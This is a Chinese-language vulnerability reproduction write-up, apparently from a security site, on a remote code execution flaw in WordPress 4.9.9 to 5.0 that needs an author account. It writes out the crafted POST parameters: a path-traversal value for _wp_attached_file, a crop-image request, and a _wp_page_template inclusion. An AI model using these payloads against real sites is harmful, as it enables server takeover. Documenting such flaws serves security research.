（CVE-2019-6977）WordPress_5.0_rce-棉花糖会员站

# （CVE-2019-6977）WordPress 5.0 rce

==================================

一、漏洞简介
————

漏洞条件：拥有一个author权限的账号

二、漏洞影响
————

影响包括windows、linux、mac在内的服务端，后端图片处理库为gd/imagick都受到影响，只不过利用难度有所差异。

其中，原文提到只影响release
5.0.0版，但现在官网上可以下载的5.0.0已经修复该漏洞。实际在WordPress
5.1-alpha-44280更新后未更新的4.9.9\~5.0.0的WordPress都受到该漏洞影响。

三、复现过程
————

传图片

![](/static/qingy/（CVE-2019-6977）WordPress_5.0_rce/img/rId24.png)

改信息

![](/static/qingy/（CVE-2019-6977）WordPress_5.0_rce/img/rId25.png)

保留该数据包，并添加POST

&meta_input[_wp_attached_file]=2019/02/2-4.jpg#/../../../../themes/twentynineteen/32.jpg

触发需要的裁剪

![](/static/qingy/（CVE-2019-6977）WordPress_5.0_rce/img/rId26.png)

裁剪

![](/static/qingy/（CVE-2019-6977）WordPress_5.0_rce/img/rId27.png)

同理保留改数据包，并将POST改为下面的操作，其中nonce以及id不变

action=crop-image&_ajax_nonce=8c2f0c9e6b&id=74&cropDetails[x1]=10&cropDetails[y1]=10&cropDetails[width]=10&cropDetails[height]=10&cropDetails[dst_width]=100&cropDetails[dst_height]=100

触发需要的裁剪

![](/static/qingy/（CVE-2019-6977）WordPress_5.0_rce/img/rId28.png)

图片已经过去了

![](/static/qingy/（CVE-2019-6977）WordPress_5.0_rce/img/rId29.png)

包含，我们选择上传一个test.txt，然后再次修改信息，如前面

&meta_input[_wp_page_template]=cropped-32.jpg

![](/static/qingy/（CVE-2019-6977）WordPress_5.0_rce/img/rId30.png)

点击查看附件页面，如果图片被裁剪之后仍保留敏感代码，则命令执行成功。

![](/static/qingy/（CVE-2019-6977）WordPress_5.0_rce/img/rId31.png)

四、参考链接
————

文章版权归作者所有，未经允许请勿转载。

THE END

国内漏洞库

（CVE-2019-6977）WordPress_5.0_rce

请登录后发表评论

1独家!超强代码审计工具上线！免费会员等你来嫖！

2有poc有语法，如何一分钟完成复现/批量检测

3Windows应急响应

4UltraEdit、UEStudio、UltraCompare 注册机

5Nacos Derby 远程命令执行(QVD-2024-26473)

6索贝融媒体search SQL注入